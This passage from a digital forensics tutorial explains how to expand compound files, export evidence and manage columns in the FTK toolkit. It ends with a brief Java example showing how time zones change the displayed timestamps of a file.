To locate important information during your investigation, you should expand individual compound file types. This lets you see the child files that are contained within a container, such as ZIP or RAR files. You can access this feature from the case manager's new case wizard, or from the Add Evidence or Additional Analysis dialogs. The following are some of the compound files that you can mount:

- E-mail files: PST, NSF, DBX, and MSG
- Compressed files: ZIP, RAR, GZIP, TAR, BZIP, and 7-ZIP
- System files: Windows thumbnails, registry, PKCS7, MS Office, and EVT

If you don't mount compound files, the child files will not be located in keyword searches or filters.
To expand compound files, perform the following steps:

1. Do one of the following:
   - For new cases, click on the Custom button in the New Case Options dialog.
   - For existing cases, go to Evidence | Additional Analysis.
2. Select Expand Compound Files.
3. Click on Expansion Options….
4. In the Compound File Expansion Options dialog, select the types of files that you want to mount.
5. Click on OK.

File and folder export

You may need to export some of the files or folders, either to help you perform some action outside of the FTK platform or simply for evidence presentation. To export files or folders, perform the following steps:

1. Select one or more files that you would like to export.
2. Right-click on the selection and select Export. A new dialog will open.

You can configure some settings before exporting, as follows:

- File Options: This field has advanced options for exporting files and folders. You can use the default options for a simple export.
- Items to Include: This field holds the selection of files and folders that you will export. The options can be checked, listed, highlighted, or all selected together.
- Destination base path: This field holds the folder in which to save the files.

Take a look at the following screenshot:

Column settings

Columns are responsible for presenting the properties or metadata related to evidence data. By default, FTK presents the most commonly used columns. However, you can add or remove columns to help you quickly find relevant information. To manage columns in FTK, in the File List view, right-click on the column bar and select Column Settings…. The number of available columns is huge. You can add or remove the columns that you need by just selecting the type and clicking on the Add button.

FTK also has some column-settings templates. You can access them by clicking on Manage and navigating to Columns | Manage Columns. You can use some ready-made templates, edit them, or create your own.
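The time-zone point made at the start of this article is easy to demonstrate outside FTK: a single file-modification instant renders as different wall-clock times depending on the zone applied. A minimal illustration (not FTK code; the timestamp is hypothetical):

```java
import java.time.Instant;
import java.time.ZoneId;

public class MacTimeZones {
    public static void main(String[] args) {
        // One modification instant, stored in UTC on the evidence drive.
        Instant mtime = Instant.parse("2014-03-18T20:00:00Z");

        // Rendered in the seizure location vs. the lab location: the same
        // instant shows a four-hour difference in local wall-clock time.
        System.out.println("Los Angeles: "
                + mtime.atZone(ZoneId.of("America/Los_Angeles")));
        System.out.println("Sao Paulo:   "
                + mtime.atZone(ZoneId.of("America/Sao_Paulo")));
    }
}
```

Unless the examiner fixes the display zone to the seizure location, the report shows times shifted by the lab's offset, which is exactly the error the Time Zone field prevents.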